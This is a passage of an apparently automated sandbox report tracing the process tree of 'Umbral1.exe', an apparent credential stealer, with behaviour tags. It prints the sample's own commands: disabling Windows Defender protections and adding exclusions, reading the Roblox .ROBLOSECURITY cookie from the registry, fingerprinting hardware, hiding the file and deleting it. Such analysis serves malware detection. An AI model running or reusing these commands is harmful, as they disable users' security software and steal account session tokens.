        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        180⤵
        
        PID:3208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        180⤵
        Detects videocard installed
        
        PID:5012
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        180⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        
        PID:2204
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        181⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        178⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        177⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        176⤵
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        175⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        174⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        173⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        172⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        171⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        170⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        169⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        168⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        167⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        166⤵
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        165⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        164⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        163⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        162⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        161⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        160⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        159⤵
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        158⤵
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        157⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        156⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        155⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        154⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        153⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        152⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        151⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        150⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        149⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        148⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        147⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        146⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        145⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        144⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        143⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        142⤵
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        141⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        140⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        139⤵
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        138⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        137⤵
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        136⤵
        
        PID:3280
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        135⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        134⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        133⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        132⤵
        
        PID:4048
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        133⤵
        Views/modifies file attributes
        
        PID:372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        133⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        133⤵
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        133⤵
        
        PID:4056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        133⤵
        
        PID:5012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        133⤵
        
        PID:4508
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        133⤵
        
        PID:4036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        133⤵
        
        PID:3980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        133⤵
        
        PID:1808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        134⤵
        
        PID:4244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        133⤵
        Detects videocard installed
        
        PID:3672
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        133⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        134⤵
        
        PID:2196
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        134⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        131⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        130⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        129⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        128⤵
        
        PID:660
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        127⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        126⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        125⤵
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        124⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        123⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        122⤵
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        121⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        120⤵
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        119⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        118⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        117⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        116⤵
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        115⤵
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        114⤵
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        113⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        112⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        111⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        110⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        109⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        108⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        107⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        106⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        105⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        104⤵
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        103⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        102⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        101⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        100⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        99⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        98⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        97⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        96⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        95⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        94⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        93⤵
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        92⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        91⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        90⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        89⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        88⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        87⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        86⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        85⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        84⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        83⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        82⤵
        Drops file in Drivers directory
        
        PID:4540
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        83⤵
        Views/modifies file attributes
        
        PID:372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        83⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        83⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        83⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        83⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        83⤵
        
        PID:1248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        83⤵
        
        PID:3960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        83⤵
        
        PID:4456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        84⤵
        
        PID:1456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        83⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3612
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        83⤵
        Detects videocard installed
        
        PID:4060
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        83⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2116
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        84⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:364
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        81⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        80⤵
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        79⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        78⤵
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        77⤵
        
        PID:1316
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        76⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        75⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        74⤵
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        73⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        72⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        71⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        70⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        69⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        68⤵
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        67⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        66⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        65⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        64⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        63⤵
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        62⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        61⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        60⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        59⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        58⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        57⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        56⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        55⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        54⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        53⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        52⤵
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        51⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        50⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        49⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        48⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        47⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        46⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        45⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        44⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        43⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        42⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        41⤵
        Drops file in Drivers directory
        
        PID:808
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        42⤵
        Views/modifies file attributes
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
